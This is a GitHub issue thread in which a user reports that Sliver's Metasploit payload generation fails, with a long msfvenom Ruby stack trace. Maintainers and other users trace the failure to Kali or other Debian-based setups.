        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:60:in `block in walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `foreach'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:50:in `walk'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path_scanner.rb:38:in `call'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path.rb:93:in `scan!'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/path.rb:77:in `entries_and_dirs'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/cache.rb:164:in `block (2 levels) in unshift_paths_locked'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/cache.rb:157:in `reverse_each'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/cache.rb:157:in `block in unshift_paths_locked'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/store.rb:53:in `block in transaction'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/store.rb:52:in `synchronize'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/store.rb:52:in `transaction'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/cache.rb:156:in `unshift_paths_locked'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/cache.rb:105:in `block in unshift_paths'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/cache.rb:105:in `synchronize'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/cache.rb:105:in `unshift_paths'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/change_observer.rb:22:in `unshift'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/railties-7.0.5/lib/rails/application.rb:342:in `add_lib_to_load_path!'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/railties-7.0.5/lib/rails/application.rb:73:in `inherited'
        from /usr/share/metasploit-framework/config/application.rb:37:in `<module:Framework>'
        from /usr/share/metasploit-framework/config/application.rb:36:in `<module:Metasploit>'
        from /usr/share/metasploit-framework/config/application.rb:35:in `<top (required)>'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/core_ext/kernel_require.rb:32:in `require'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/core_ext/kernel_require.rb:32:in `require'
        from /usr/share/metasploit-framework/config/environment.rb:2:in `<top (required)>'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/core_ext/kernel_require.rb:32:in `require'
        from /usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/bootsnap-1.16.0/lib/bootsnap/load_path_cache/core_ext/kernel_require.rb:32:in `require'
        from /usr/share/metasploit-framework/lib/msfenv.rb:28:in `<top (required)>'
        from <internal:/usr/lib/ruby/vendor_ruby/rubygems/core_ext/kernel_require.rb>:85:in `require'
        from <internal:/usr/lib/ruby/vendor_ruby/rubygems/core_ext/kernel_require.rb>:85:in `require'
        from /usr/bin/msfvenom:27:in `require_deps'
        from /usr/bin/msfvenom:44:in `init_framework'
        from /usr/bin/msfvenom:67:in `framework'
        from /usr/bin/msfvenom:472:in `<main>'
 
INFO[2023-06-16T08:09:14+02:00] [sliver/server/msf/msf.go:209] exit status 1 
WARN[2023-06-16T08:09:14+02:00] [sliver/server/rpc/rpc-msf.go:196] Error while generating msf payload: exit status 1 
ERRO[2023-06-16T08:09:14+02:00] [github.com/grpc-ecosystem/go-grpc-middleware@v1.4.0/logging/logrus/options.go:224] finished unary call with code Unknown

@rkervella
Copy link
Member

Are you able to run msfconsole?

@n3rada
Copy link
Contributor Author

n3rada commented Jun 16, 2023

Totally without any problem. And the msfdb status is fine too. I'm keen on understanding the problem behind this.

@rkervella
Copy link
Member

I'll try on Kali.

@n3rada
Copy link
Contributor Author

n3rada commented Jun 16, 2023

I admit I haven't tried it with the sliver provided by kali. I prefer to have the latest version that can be installed here.

@rkervella
Copy link
Member

I admit I haven't tried it with the sliver provided by kali. I prefer to have the latest version that can be installed here.

Yeah I would avoid using the version from the apt repos. We don't package this version and there have been issues with Kali shipping broken Sliver packages in the past.

@rkervella
Copy link
Member

It seems to be an issue with Kali, I can reproduce there (the call never completes or takes forever) but not on other systems.

@atanu2679
Copy link

I admit I haven't tried it with the sliver provided by kali. I prefer to have the latest version that can be installed here.

same problem man i also reported...and im using parrot

@n3rada
Copy link
Contributor Author

n3rada commented Jul 6, 2023

Debian based OS problem?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

4 participants